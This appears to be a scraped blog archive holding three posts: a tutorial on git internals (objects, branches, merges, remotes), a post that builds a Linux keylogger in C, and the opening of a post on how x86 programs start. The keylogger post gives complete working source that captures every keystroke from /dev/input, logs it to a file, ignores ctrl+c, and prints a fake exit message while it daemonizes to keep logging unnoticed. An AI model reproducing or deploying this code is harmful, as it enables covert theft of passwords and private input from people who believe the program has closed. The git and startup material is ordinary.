We\u0026rsquo;ll look at how this file changes its data with the different commands we enter.\nLet\u0026rsquo;s add a file and look for changes in the .git folder at each step.\nLooks like there are no changes for simply creating a file and adding some data to it. But things change as soon as I git add . it. So git starts monitoring the changes as soon as I add the files using the git add command.\nOn investigating further, we can see that git add has created a blob object under the ./.git/objects/ folder. The file is zlib compressed data\u0026hellip; so we can uncompress it and look at its content easily using the zlib-flate -uncompress command.\nOn adding new content to the same file newfile.txt, git created a new blob object. Apparently, git does not store the diffs of the file here; instead it stores the complete object. So if you have 3 versions of a file with a single line of change in each of them, then git is going to store 3 different blobs, instead of storing a diff of the files.\nYou can also see that the previous data is not gone from the git repository. We have both of our changes - old and new.\nLet\u0026rsquo;s switch back again to the first data we entered in the file.\nThis time git has not created any new object. This means git creates a new blob object whenever there is new data, and reuses the previous blob object whenever possible.\nNow let\u0026rsquo;s see what changes we get on committing these blob objects.\nOn committing there are 2 more objects and some logs. Let\u0026rsquo;s inspect each one to see if we can get anything out of it.\nOne of the objects is a tree object and the other one is the commit object. The tree object lists the blob we added together with its file name, and the commit object points to that tree and holds the commit message along with a few other details.\nThe other 2 logs which were generated are as above. 
By looking at these we can get that they both point to the commit object for now.\nAnd if we look at the .git/HEAD file, it still points to this reference - ref: refs/heads/master. Further looking in .git/refs/heads/master file, we get that this points to the commit object we created.\nIf we are to visualize the current situation it\u0026rsquo;ll be something like this.\nHEAD +---------+ | | | | | | v master +----------+ | | | v +---------+--------+ | | | ed6108f | | | +------------------+ Let\u0026rsquo;s add more commits to it now.\nWe now have 2 new objects for 2 new files.\nBut if we add another file with the same content in it (In other words, if use the repeatative data) then, git will not create new blob objects for it. It\u0026rsquo;ll use the previous blob object to track it.\nThis means that git only tracks the data in the file along with the file name\u0026hellip; instead of directly tracking the files.\nLet\u0026rsquo;s check the logs now.\nAnd we can get the same data from the .git/logs/HEAD file.\nAgain checking on the .git/HEAD\nVisual diagram for the above will look something like this.\nHEAD +---------+ | | | | | | v master +----------+ | | | v +------------------+ +--------+-------+ | | | | | 20998091 +\u0026lt;-------------+ ed6108f | | | | | +------------------+ +----------------+ You can also check this from the screenshot below.\nLet\u0026rsquo;s go branching now. You can create a new branch using git checkout -b feature. This command will create a branch for you. We can also observe that there are 2 new files.. 1 in the logs and another one in the refs/heads.\nLet\u0026rsquo;s see what\u0026rsquo;s there in these files.\nWe can observe 2 interesting things here:\nfeature and master branch point to the same commit at the moment. .git/HEAD (HEAD) points to the feature branch. This means whatever changes we will make it\u0026rsquo;ll be made on the feature branch. 
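The two-step lookup we just did by hand (read .git/HEAD, then read the ref file it names) can be sketched in a few lines of Python. This is only an illustration under simple assumptions, not how git itself is implemented: it handles loose ref files only and ignores packed-refs, and the helper names resolve_head and make_fake_git_dir as well as the commit id are made up for the demo.

```python
import os
import tempfile


def resolve_head(git_dir):
    """Follow .git/HEAD to the branch it names and the commit that branch points to."""
    with open(os.path.join(git_dir, "HEAD")) as f:
        head = f.read().strip()
    if not head.startswith("ref: "):
        # Detached HEAD: the file holds a commit id instead of a reference
        return None, head
    ref = head[len("ref: "):]
    ref_path = os.path.join(git_dir, ref)
    if not os.path.exists(ref_path):
        # No loose ref file: a branch without commits, or a ref stored in packed-refs
        return ref, None
    with open(ref_path) as f:
        return ref, f.read().strip()


def make_fake_git_dir(root, branch, commit_id):
    """Lay out just enough of a .git folder for the demo (hypothetical contents)."""
    os.makedirs(os.path.join(root, "refs", "heads"))
    with open(os.path.join(root, "HEAD"), "w") as f:
        f.write(f"ref: refs/heads/{branch}\n")
    with open(os.path.join(root, "refs", "heads", branch), "w") as f:
        f.write(commit_id + "\n")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        make_fake_git_dir(root, "feature", "2" * 40)  # made-up commit id
        print(resolve_head(root))
```

Pointing resolve_head at the real .git folder of the playground repo should give the same branch and commit id that we read from the files manually.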
master +----------+ | | | v +------------------+ +--------+-------+ | | | | | 20998091 +\u0026lt;-------------+ ed6108f | | | | | +------------------+ +----------------+ HEAD ^ | | | | | | | | +---------\u0026gt; feature +-----------+ Let\u0026rsquo;s add new commits and see if we can see what we just concluded.\nmaster +--------+ | | | v +----------------+ +-------+----------+ +----------------+ | | | | | | | 748ffe6 +\u0026lt;----------+ 20998091 +\u0026lt;-------------+ ed6108f | | | | | | | +----------------+ +------------------+ +---------+------+ HEAD ^ | | | | | | | | +---------\u0026gt; feature +-----------+ At this point, the master is direct parent to the feature branch. So if we just merge feature to master then it\u0026rsquo;ll simply move the label one commit ahead. There is no need for a new commit to add both the changes.\nFor this, we need to change back to the master branch. Behind the scenes, this will simply change the .git/HEAD reference to master from feature.\nAnd visually, it\u0026rsquo;ll look something like this.\nHEAD +---------+ | | | | | | v master +--------+ | | | v +----------------+ +-------+----------+ +----------------+ | | | | | | | 748ffe6 +\u0026lt;----------+ 20998091 +\u0026lt;-------------+ ed6108f | | | | | | | +----------------+ +------------------+ +---------+------+ ^ | | | | feature +-----------+ We can see that there are some changes in the feature branch that master branch does not have yet. We can merge feature branch to master branch to get these features in the master.\nTo merge, we need to switch to master branch, and then simply merge it.\nThis type of merge is called fast-forward merge (as given in the output). 
This is simply moving forward and shifting the label (master) to point to appropriate commit.\nHEAD +---------+ | | | | | | v master +--------+ | | | v +----------------+ +-------+----------+ +----------------+ | | | | | | | 748ffe6 +\u0026lt;----------+ 20998091 +\u0026lt;-------------+ ed6108f | | | | | | | +----------------+ +------------------+ +---------+------+ ^ | | | | feature +-----------+ Let\u0026rsquo;s make more changes to feature and master both. And then merge them.\nLooking the logs in feature branch, we get -\nAnd for master branch -\nWe can clearly see that both have all the commits same except the latest one. And since both the branches had their different log files they have separate logs. But we can use a pretty handy command to check both the logs combined and a graphical representation (sort of) for both.\ngit log --graph --decorate --all\nSince I am in my main branch right now, so the HEAD points to master.\nThis situation will look something like this diagram below.\nHEAD +---------+ | | v master +--------+ | | v +-------+-------+ +----------------+ +------------------+ +----------------+ | | | | | | | | | 633145f +\u0026lt;--+--+ 748ffe6 +\u0026lt;----------+ 20998091 +\u0026lt;-------------+ ed6108f | | | | | | | | | | +---------------+ | +----------------+ +------------------+ +----------------+ | | | | +----------------+ | | | | | 68d38e06 +\u0026lt;--+ | | +-------+--------+ ^ | | feature +-----------+ let\u0026rsquo;s see what happens when we merge these 2 branches now.\nThis time it creates a new commit to merge both the branches and moves label master ahead to that commit, along with the HEAD.\nHEAD +---------+ | | v master +--+ | | | v +-------+---------+ +---------------+ +----------------+ +------------------+ +----------------+ | | | | | | | | | | | 76b2abc +\u0026lt;--------+ 633145f +\u0026lt;--+--+ 748ffe6 +\u0026lt;----------+ 20998091 +\u0026lt;-------------+ ed6108f | | | | | | | | | | | | +-------+---------+ 
+---------------+ | +----------------+ +------------------+ +----------------+ ^ | | | | | | | | +----------------+ | | | | | +------------------+ 68d38e06 +\u0026lt;--+ | | +--------+-------+ ^ | | feature +-----------+ In this merge, master calculated that it is not in the same hierarchy as feature. So it created a new object, merged the data from the feature and commited it as any other object.\nAfter merging, master and head labels will move forward to the latest commit. But the feature will be the same as before\u0026hellip; as we have not changed anything in that yet.\nWhat if that this new commit 76b2abc was a mistake and we want our master and HEAD labels back to commit 633145f?\nWe can simply reset the commits by git reset 633145 command. This will move my labels back to this commit mentioned.\nInterestingly enough, this will not remove the commit 76b2abc from the .git/objects/ directory. It\u0026rsquo;ll simply write a new log in the logs file and git log --graph --decorate --all command will give you a good output back.\nWhat if we want to test the new feature with all the current updates of master?\nFor this, we need to go to feature branch and merge master to it using git merge master\n(I had to remove newfile7.txt from master branch in order to switch the branch as there were few changes untracked. 
There are other ways around this as well, but to keep things simple I just deleted it)\nThis is again recursive strategy merge.\nmaster +--+ | | | v +--------+------+ +----------------+ +------------------+ +----------------+ | | | | | | | | +-------------------+ 633145f +\u0026lt;--+--+ 748ffe6 +\u0026lt;----------+ 20998091 +\u0026lt;-------------+ ed6108f | | | | | | | | | | | | +---------------+ | +----------------+ +------------------+ +----------------+ | | | | | | | | +--------v--------+ +----------------+ | | | | | | | 88dd609c +\u0026lt;--------+ 68d38e06 +\u0026lt;--+ | | | | +--------+--------+ +----------------+ ^ | | +-----\u0026gt; feature +------+ | | HEAD+ This way there was no change made in the master and a new feature was added and can be tested properly. You can call this feature integration test. If the feature passes the tests and we decide to update master with this feature, we can simply switch to master branch and merge feature to it.\nAfter checking out to master using git checkout master command, HEAD points to master like in the screenshot below.\nOn merging, we get a fast-forward merge since the master is direct parent of the commit which is to be merged and there was no need of a new commit to be created.\nAfter merge, master, HEAD, and feature point to the same commit.\n+---------------+ +----------------+ +------------------+ +----------------+ | | | | | | | | +------------+ 633145f +\u0026lt;--+--+ 748ffe6 +\u0026lt;----------+ 20998091 +\u0026lt;-------------+ ed6108f | +-----\u0026gt; master +--+ | | | | | | | | | | | | | +---------------+ | +----------------+ +------------------+ +----------------+ | | | | HEAD+ | | | v | | +--+------------v-+ | | | +----------------+ | | | | | | | 88dd609c +\u0026lt;--------+ 68d38e06 +\u0026lt;--+ | | | | +--------+--------+ +----------------+ ^ | | feature +------+ Collaborating with git Usually we don\u0026rsquo;t use git standalone in our machine. 
What I mean is, we do use git locally most of the time, but at some point we need to share our commits with someone else over the network.\nTo cover the whole picture in a line \u0026ndash;\u0026gt;\nTo **get commits** from someone else we need to do `git pull`... and to **send our commits** out on the internet we need to `git push`. I am going the way we usually go and do things - \u0026ldquo;start with cloning a repo\u0026rdquo;. After cloning a repo I have got this.\nLet\u0026rsquo;s inspect it.\nThis time there are no loose objects like the last time. But we have new kinds of files - pack and idx. Git creates pack file(s) by packing a set of git objects together, and builds an idx (index) file alongside each pack. Git uses this index to locate the individual objects inside the pack file. But this is not important at this point.\nThe point I wanted to get started with is remotes. There is a new reference in the .git/refs/ directory that points to something called remotes/origin/HEAD.\nSo what the heck is origin anyway? Why should I care?\nIf you go and check the .git/config file\u0026hellip;you will know what origin means.\nHere origin is just a name that points to the github repo from which I cloned my current repository. So yeah, you should care about it if you have any intention to push/pull to this remote repository anytime in the future.\nAny branch with a name like refs/remotes/*/* is called a remote tracking branch. As the name suggests, it helps in tracking the remote status. It always shows the remote status as of the last time both were synced, and it stays wherever it is until they are synced again.\nSo from all this, we can see that there is no need for origin (or any remote) to be on the internet or on the network all the time. Both sides just need to be in contact whenever they need to be synced. 
After that\u0026rsquo;s the whole point of being a distributed system.\nWhat we need is a remote repository..that can give us the pack files\u0026hellip;and other objects\u0026hellip; and then a working directory that we can use to add our changes and maybe another working directory that someone else is using to make his changes.\nWorkflow I am going to use now is as follows:-\nstart project + | v add new file +------------+ +-----------+ | | v v make a feature fix some old bugs + + | | | | | | | | v | | integrate and test new feature \u0026lt;------+ + | | | | | | +---------\u0026gt; (Push now) After integrating master to our feature we have:-\na feature branch with new feature and base from master. and master which is not changed. So if we want we can always use the previous stable version master or the bleeding edge feature.\nNow time to push it\u0026hellip; But instead of actually pushing it, I\u0026rsquo;ll make a local bare clone that is exactly same as the repo handled by github or similar after you make a push.\nTo make a bare clone of the repo you can use --bare option and rest is same.\nCommand:- git clone --bare mywork remote_repo\nNow I have 2 repos\u0026hellip; And the remote_repo has the content of .git folder\u0026hellip; It does not have any tracking branches this time. Well, we don\u0026rsquo;t need tracking branches in this repo. Do we?\nAlso I can see that all the commits I made are present there in the remote_repo.\nLet\u0026rsquo;s say now someone clones this repo\u0026hellip;\nHe also gets all the commits from the remote repo\nWith my remote_repo as the origin.\nBecause origin can be any bare repository.\nAfter someone has added their own branch and commited that change to his repo. Now he is ready to push/share the changes to/with origin.\nHe can share the data simply using the push command.\nNow our origin has got that new branch. 
So I had made changes to master branch it would have reflected in the master branch of the origin.\nAfter running below commands, someone can switch to his master branch and merge his user_feature branch.\ngit checkout master git merge user_feature master has now got all the new commits. Time to push/share master to our origin.\nAfter pushing changes to origin all the commits made to master are shared with origin/master and now both of them point to a single commit.\nI can also pull the changes from remote_repo to mywork\u0026hellip; the only thing I have to do is set a remote that points to the repo I want to pull data from.\nOr for now I can simply specify from where to pull and merge where.\ngit pull ./../remote_repo/ master This will give me the latest commits made by someone and pushed to remote.\nConclusion This is how a typical git flow works. There are obviously other git flows better and complex than this but knowing this flow gives you a basic idea of how to make your way around git and use it effectively to manage your project.\nWhere to go from here?? You should start playing on your own exploring more commands and looking up their help pages for descriptions and other information. I\u0026rsquo;ll recommend to read the Pro Git Book to understand other concepts as well. It is available for free.\n","permalink":"https://ayedaemon.github.io/post/2021/02/git-form-inside-out/","summary":"\u003cblockquote\u003e\n\u003cp\u003eInside out approach to learn git\u003c/p\u003e\n\u003c/blockquote\u003e","title":"Git Form Inside Out"},{"content":" Developing a low level keylogger for linux using C.\nI am putting this blog in a bottom-up approach. We\u0026rsquo;ll start with the basic program that can act as a keylogger.\nWhat is a Keylogger?? How to make one? Keylogger is a program (or a hardware sometimes) that logs all the keystrokes made by the keyboard.\nWe know that there is something in OS that listens to the keyboard events and perform actions accordingly. 
For example, when we press alt+tab it changes the current focus to another application/screen.\nAccording to wikipedia, in linux, the event devices generalizes all the raw input from device drivers and makes them available through character devices in /dev/input/ directory.\n(If you don\u0026rsquo;t know about character devices, think it as a real-time stream data)\nAll the event files/devices are located in /dev/input/ directory. It was very easy to figure out the file after looking at the directory structure.\nIt is pretty obvious that my keyboard event file is /dev/input/by-path/platform-i8042-serio-0-event-kbd. (For you, this may change, but it\u0026rsquo;ll have kbd in it\u0026rsquo;s name!!)\nSo I wrote a program that will continuously read data from this file and print it on screen.\nCODE - basic_keylogger.c\n#include \u0026lt;errno.h\u0026gt; #include \u0026lt;fcntl.h\u0026gt; #include \u0026lt;linux/input.h\u0026gt; #include \u0026lt;stdio.h\u0026gt; #include \u0026lt;stdlib.h\u0026gt; #include \u0026lt;unistd.h\u0026gt; int main(void) { errno = 0; struct input_event ev; //This is the keyboard event file char* kbd_path = \u0026#34;/dev/input/by-path/platform-i8042-serio-0-event-kbd\u0026#34;; int fd = open(kbd_path, O_RDONLY); if(fd == -1) { printf(\u0026#34;Error %d\\n\u0026#34;, errno); exit(EXIT_FAILURE); } while (1) { read(fd, \u0026amp;ev, sizeof(struct input_event)); //read from keyboard printf(\u0026#34;%i - %i\\n\u0026#34;,ev.code, ev.value); } return 0; } Compile this and run it.\n## Compile gcc basic_keylogger.c -o basic_keylogger.out ## Execute it ./basic_keylogger.out This will give output something like this.\nI am not sure about what this all is. But I saw some pattern and decided to learn more on this later. The pattern here is, whenever ev.value is 1 then I am getting a ev.code unique for each key. 
So I decided to just filter out the data with ev.value == 1.\nCODE - basic_keylogger.c (minor modification)\n#include \u0026lt;errno.h\u0026gt; #include \u0026lt;fcntl.h\u0026gt; #include \u0026lt;linux/input.h\u0026gt; #include \u0026lt;stdio.h\u0026gt; #include \u0026lt;stdlib.h\u0026gt; #include \u0026lt;unistd.h\u0026gt; int main(void) { errno = 0; struct input_event ev; //This is the keyboard event file char* kbd_path = \u0026#34;/dev/input/by-path/platform-i8042-serio-0-event-kbd\u0026#34;; int fd = open(kbd_path, O_RDONLY); if(fd == -1) { printf(\u0026#34;Error %d\\n\u0026#34;, errno); exit(EXIT_FAILURE); } while (1) { read(fd, \u0026amp;ev, sizeof(struct input_event)); //read from keyboard if(ev.value == 1) { printf(\u0026#34;%i - %i\\n\u0026#34;,ev.code, ev.value); } } return 0; } After again compiling and running this, I was just getting the useful data from everything.\nThis is the simple idea of making the keylogger. But there are a lot of things we haven\u0026rsquo;t done.\nMaking our keylogger more dynamic. Till now, we are using hard coded file name for the keyboard. We can make it more dynamic by searching for the kbd file in /dev/input/by-path/ and then read that file for the events. 
And then save the events in a file.\nFor this purpose, I have changed the working directory structure to make the project more modular.\nCODE:- basic_keylogger.c\n#include \u0026#34;basic_keylogger.h\u0026#34; int main(void) { errno = 0; struct input_event ev; char* kbd = get_me_a_keyboard(); // Get keyboard name char* kbd_path = concat(INPUT_EVENT_DIR, kbd); // Get complete path for keyboard int fd = open(kbd_path, O_RDONLY); if(fd == -1) { printf(\u0026#34;Error %d\\n\u0026#34;, errno); exit(EXIT_FAILURE); } printf(\u0026#34;Reading from %s\\n\u0026#34;,kbd_path); free(kbd_path); // free some memory while (1) { read(fd, \u0026amp;ev, sizeof(struct input_event)); //read from keyboard if(ev.type == 1) log_in_file(ev); //log the event } return 0; } This main program includes basic_keylogger.h file - which I have used to include all the libraries and define macros.\nCODE:- basic_keylogger.h\n/* // // defining variables // */ #define INPUT_EVENT_DIR \u0026#34;/dev/input/by-path/\u0026#34; #define LOG_FILE \u0026#34;/tmp/keylog.txt\u0026#34; /* // // importing system headers // */ #include \u0026lt;dirent.h\u0026gt; #include \u0026lt;errno.h\u0026gt; #include \u0026lt;fcntl.h\u0026gt; #include \u0026lt;linux/input.h\u0026gt; #include \u0026lt;stdio.h\u0026gt; #include \u0026lt;stdlib.h\u0026gt; #include \u0026lt;string.h\u0026gt; #include \u0026lt;sys/stat.h\u0026gt; #include \u0026lt;sys/types.h\u0026gt; #include \u0026lt;time.h\u0026gt; #include \u0026lt;unistd.h\u0026gt; /* // // importing utility functions // */ #include \u0026#34;utils/logger.c\u0026#34; #include \u0026#34;utils/helpers.c\u0026#34; #include \u0026#34;utils/keyboard.c\u0026#34; Here are 3 more files included for obvious purposes.\nCODE:- utils/logger.c (logger function)\nvoid log_in_file(struct input_event ev) { printf(\u0026#34;Logging\u0026#34;); time_t t = time(NULL); struct tm tm = *localtime(\u0026amp;t); FILE* fptr = fopen(LOG_FILE, \u0026#34;a\u0026#34;); // print( [date time] keycode 
keyvalue ) - keyvalue =\u0026gt; {press; lift; long press} fprintf(fptr, \u0026#34;[ %d-%02d-%02d %02d:%02d:%02d ] key %i state %i\\n\u0026#34;, tm.tm_year + 1900, tm.tm_mon + 1, tm.tm_mday, tm.tm_hour, tm.tm_min, tm.tm_sec, ev.code, ev.value); if(tm.tm_sec == 0) { /* Do whatever you want to do here It is like a scheduler section.*/ //fprintf(fptr, \u0026#34;%s\\n\u0026#34;, \u0026#34;1 minute check\\n\u0026#34;); } fclose(fptr); printf(\u0026#34; logged\\n\u0026#34;); } CODE:- utils/helpers.c (now only used for concatenation of 2 strings)\nchar* concat(const char *s1, const char *s2) { const size_t len1 = strlen(s1); const size_t len2 = strlen(s2); char *result = malloc(len1 + len2 + 1); // +1 for the null-terminator // in real code you would check for errors in malloc here memcpy(result, s1, len1); memcpy(result + len1, s2, len2 + 1); // +1 to copy the null-terminator return result; } CODE:- utils/keyboard.c (get keyboard device from the directory)\nchar* get_me_a_keyboard() { struct dirent **namelist; int n=0,i=0; n = scandir(INPUT_EVENT_DIR, \u0026amp;namelist, NULL, alphasort); // read the directory for the files if(n==-1) { // perror(\u0026#34;Scandir Failed!!\\n\u0026#34;); exit(EXIT_FAILURE); } if(n\u0026lt;=2){ // perror(\u0026#34;No devices found!!\\n\u0026#34;); exit(EXIT_FAILURE); } // printf(\u0026#34;[ * ] %d Devices found !!\\n\u0026#34;,n-2); for(i=0; i\u0026lt;n; i++) { if(strcmp(namelist[i]-\u0026gt;d_name, \u0026#34;.\u0026#34;) == 0 || strcmp(namelist[i]-\u0026gt;d_name, \u0026#34;..\u0026#34;) == 0) // skip . and .. (strcmp compares contents; == would only compare pointers) continue; if(strstr(namelist[i]-\u0026gt;d_name,\u0026#34;kbd\u0026#34;)) // check if the filename has \u0026#34;kbd\u0026#34; (keyboard) in it break; // if yes, do not look further } if(i == n) { // no entry with \u0026#34;kbd\u0026#34; in its name, so do not index past the end of namelist exit(EXIT_FAILURE); } return namelist[i]-\u0026gt;d_name; // and return keyboard file name to caller function } After compiling and executing the binary. 
We get logging - logged message on the terminal and the actual log is being stored in /tmp/keylog.txt file - as mentioned in basic_keylogger.h file.\nWhat next? \u0026hellip;Getting evil!! We can close the program by pressing ctrl+c or suspend it by pressing ctrl+z. These key combinations send a signal to the process: ctrl+c sends SIGINT (interrupt) and ctrl+z sends SIGTSTP (stop). And we can handle these signals in our code\u0026hellip;. using signal.h header file. (import this in the code.)\nCODE - basic_keylogger.c (added signal handlers)\n#include \u0026#34;basic_keylogger.h\u0026#34; // Signal handler function void signal_handler(int sig) { printf(\u0026#34;Sorry, But I won\u0026#39;t exit.\\n\u0026#34;); } int main(void) { errno = 0; struct sigaction signal = {0}; // create signal action struct (zeroed, so sa_flags and sa_mask are not garbage) signal.sa_handler = signal_handler; // initialize the handler function sigaction(SIGINT, \u0026amp;signal, NULL); // assign the signal action to a specific signal struct input_event ev; char* kbd = get_me_a_keyboard(); // Get keyboard name char* kbd_path = concat(INPUT_EVENT_DIR, kbd); // Get complete path for keyboard int fd = open(kbd_path, O_RDONLY); if(fd == -1) { printf(\u0026#34;Error %d\\n\u0026#34;, errno); exit(EXIT_FAILURE); } printf(\u0026#34;Reading from %s\\n\u0026#34;,kbd_path); free(kbd_path); // free some memory while (1) { read(fd, \u0026amp;ev, sizeof(struct input_event)); //read from keyboard if(ev.type == 1) log_in_file(ev); //log the event } return 0; } As expected with this code, I am unable to close the program with ctrl+c. Whenever I press it, it gives me a message that \u0026ldquo;Sorry, But I won\u0026rsquo;t exit.\u0026rdquo;\nThis program can only be terminated with kill signal. See here to know how.\nGoing undercover What if we trick user with a false closing message and go undercover (Daemon process).\nThe idea is to turn the process into a daemon process whenever the user presses ctrl+c. 
Also give the user a good message so that he actually believes that the process has closed and then probably he\u0026rsquo;ll not check for the running processes to find if it actually has closed.\nTo achieve this, I\u0026rsquo;ll make slight changes to my signal_handler function and add a daemonize function to create a daemon process. If you have already not seen what a daemon process is and how to create one - Look here.\nCODE:- basic_keylogger.c (changed the signal_handler function)\n#include \u0026#34;basic_keylogger.h\u0026#34; // Signal handler function void signal_handler(int sig) { printf(\u0026#34;Exiting very gracefully :)\u0026#34;); //fake message daemonize(); // Go undercover } int main(void) { errno = 0; struct sigaction signal; // create signal action struct signal.sa_handler = signal_handler; // initialize the handler function sigaction(SIGINT, \u0026amp;signal, NULL); // assign the signal action to a specific signal struct input_event ev; char* kbd = get_me_a_keyboard(); // Get keyboard name char* kbd_path = concat(INPUT_EVENT_DIR, kbd); // Get complete path for keyboard int fd = open(kbd_path, O_RDONLY); if(fd == -1) { printf(\u0026#34;Error %d\\n\u0026#34;, errno); exit(EXIT_FAILURE); } printf(\u0026#34;Reading from %s\\n\u0026#34;,kbd_path); free(kbd_path); // free some memory while (1) { read(fd, \u0026amp;ev, sizeof(struct input_event)); //read from keyboard if(ev.type == 1) log_in_file(ev); //log the event } return 0; } Here, I am using daemonize funtion which is defined in ./utils/daemonize.c and imported in basic_keylogger.h.\nCODE:- daemonize.c\nint daemonize() { pid_t pid, sid; /* Fork off the parent process */ pid = fork(); if (pid \u0026lt; 0) { exit(EXIT_FAILURE); } /* If we got a good PID, then we can exit the parent process. 
*/ if (pid \u0026gt; 0) { // Child can continue to run even after the parent has finished executing exit(EXIT_SUCCESS); } /* Change the file mode mask */ umask(0); /* Open any logs here */ /* Create a new SID for the child process */ sid = setsid(); if (sid \u0026lt; 0) { /* Log the failure */ exit(EXIT_FAILURE); } /* Change the current working directory */ if ((chdir(\u0026#34;/\u0026#34;)) \u0026lt; 0) { /* Log the failure */ exit(EXIT_FAILURE); } /* Close out the standard file descriptors */ //Because daemons generally dont interact directly with user so there is no need of keeping these open close(STDIN_FILENO); close(STDOUT_FILENO); close(STDERR_FILENO); return(pid); } After compiling and executing this code. We get a decent exit message like this.\nBut we can check from the /tmp/keylog.txt file that the program is still adding key events to the file. Use tail -f /tmp/keylog.txt command to check appending logs.\nYou can look for the process using ps -A | grep 'your_binary_name' command to get the process ID of the daemon keylogger running behind the scene. And then kill it by using kill -9 \u0026lt;processID\u0026gt;.\nConclusion. You can take this blog as an educational purpose demo that even the least suspecting program from any untrusted source can be malicious and can do a lot of things you have not expected it to do. We can create simple programs, that can read the whole file system to know what programs you use.. get the files with sensitive information.. passwords stored in the browsers.. setup a trojan.. and what not. Also with small modifications, I can send all the logs created locally to a remote server.\nThis program is only tested in a bare-metal linux system. This can\u0026rsquo;t work on windows (because they have different system calls and API to work) and this is also not working in VM for some reason which I am trying to figure out why. 
If you have any knowledge regarding this, please feel free to reach out and help me to understand the problem.\nAll this code is present in github repo here -\u0026gt; (https://github.com/ayedaemon/C-practice/tree/master/lin-c/keylogger)\n","permalink":"https://ayedaemon.github.io/post/2021/02/keylogger-for-linux/","summary":"\u003cblockquote\u003e\n\u003cp\u003eDeveloping a low level keylogger for linux using C.\u003c/p\u003e\n\u003c/blockquote\u003e","title":"Keylogger for Linux"},{"content":" How your x86 program starts up in linux\nIn this blog, I will assume that you have basic understanding of assembly language. If not, then you should consider learning it. Although I\u0026rsquo;ll try to explain things in the easiest terms as possible.\nBasic C program Let\u0026rsquo;s start with a basic C program\u0026hellip;\nCODE: (Saving it with simple.c)\n#include \u0026lt;stdio.h\u0026gt; int main() { printf(\u0026#34;Hello main\u0026#34;); return 0; } \u0026hellip; and compile it the way we have always done it with gcc.\ngcc simple.c -o simple.out Now I have got a file simple.out which should be my executable binary.. I have a habit to check the file using file command to be more sure.\n$ file simple.out simple.out: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=11c9b757baf9a3a8271443682135b7488cb04e52, for GNU/Linux 3.2.0, not stripped And now we know that it is an ELF binary and dynamically linked.\nLet\u0026rsquo;s see what shared objects they use.\n$ ldd simple.out linux-vdso.so.1 (0x00007fffbc364000) libc.so.6 =\u0026gt; /usr/lib/libc.so.6 (0x00007f5b0d6a7000) /lib64/ld-linux-x86-64.so.2 =\u0026gt; /usr/lib64/ld-linux-x86-64.so.2 (0x00007f5b0d8b9000) The interesting one here is libc.so.6 =\u0026gt; /usr/lib/libc.so.6 (0x00007f5b0d6a7000). This shared object is used in almost every linux command you know. On checking the man page for libc.. 
I came to know that it is the standard C library used in linux.\nThe question I am asking myself here is \u0026ndash;\u0026gt; Is this somehow responsible for executing the main() function in C programs?\nMaybe. We\u0026rsquo;ll see that later.\nLet\u0026rsquo;s disassemble our simple binary. I can check the assembly code of the executable using objdump -d simple.out command on my terminal. It\u0026rsquo;ll give me a lot of output but right now I am concerned about the main() function\u0026hellip; so I\u0026rsquo;ll just grep it.\n$ objdump -d simple.out | grep -A12 \u0026#39;\u0026lt;main\u0026gt;:\u0026#39; 0000000000001139 \u0026lt;main\u0026gt;: 1139:\t55 push %rbp 113a:\t48 89 e5 mov %rsp,%rbp 113d:\t48 8d 3d c0 0e 00 00 lea 0xec0(%rip),%rdi # 2004 \u0026lt;_IO_stdin_used+0x4\u0026gt; 1144:\tb8 00 00 00 00 mov $0x0,%eax 1149:\te8 e2 fe ff ff callq 1030 \u0026lt;printf@plt\u0026gt; 114e:\tb8 00 00 00 00 mov $0x0,%eax 1153:\t5d pop %rbp 1154:\tc3 retq 1155:\t66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1) 115c:\t00 00 00 115f:\t90 nop If you don\u0026rsquo;t understand assembly, I get what you are feeling right now\nBut you don\u0026rsquo;t need to understand it completely right now. You can look into some syntax and it\u0026rsquo;ll make sense in some time. Like callq 1030 \u0026lt;printf@plt\u0026gt; - this looks like our printf() function. And we know that before calling a function, its arguments have to be set up (on x86-64 the first few go in registers such as %rdi, not on the stack). 
That means the lea above the callq statement, which loads an address into %rdi, is pointing at my string Hello main (the argument passed to printf()). The mov $0x0,%eax in between only tells the variadic printf() that no vector registers are used.\nAnother Question \u0026ndash;\u0026gt; Is main() really the starting point of execution??\nOn further looking into the objdump -d simple.out command output\u0026hellip; I can understand that there is another function, _start, that leads to the main() function.\nDisassembly of section .text: 0000000000001040 \u0026lt;_start\u0026gt;: 1040:\tf3 0f 1e fa endbr64 1044:\t31 ed xor %ebp,%ebp 1046:\t49 89 d1 mov %rdx,%r9 1049:\t5e pop %rsi 104a:\t48 89 e2 mov %rsp,%rdx 104d:\t48 83 e4 f0 and $0xfffffffffffffff0,%rsp 1051:\t50 push %rax 1052:\t54 push %rsp 1053:\t4c 8d 05 76 01 00 00 lea 0x176(%rip),%r8 # 11d0 \u0026lt;__libc_csu_fini\u0026gt; 105a:\t48 8d 0d ff 00 00 00 lea 0xff(%rip),%rcx # 1160 \u0026lt;__libc_csu_init\u0026gt; 1061:\t48 8d 3d d1 00 00 00 lea 0xd1(%rip),%rdi # 1139 \u0026lt;main\u0026gt; 1068:\tff 15 72 2f 00 00 callq *0x2f72(%rip) # 3fe0 \u0026lt;__libc_start_main@GLIBC_2.2.5\u0026gt; 106e:\tf4 hlt 106f:\t90 nop It does not call the main() directly.. But it takes the address of main() as an argument and then calls __libc_start_main (from glibc). Along with main(), it also passes __libc_csu_fini and __libc_csu_init as arguments.\nThe whole picture This image is taken from here\u0026hellip; This is a complete in-depth blog explaining How the heck do we get to main()?\nNow from the picture, it is very much clear that _start passes main (and the other 2 functions) to __libc_start_main (the disassembly only shows it as an indirect call, so the picture helps confirm the name). And __libc_start_main starts the main().\nBut what the hell is everything else??\nTo start with, Loader is a program that loads an executable from disk to RAM (primary memory) for execution. In unix, it is the handler for execve() system call. 
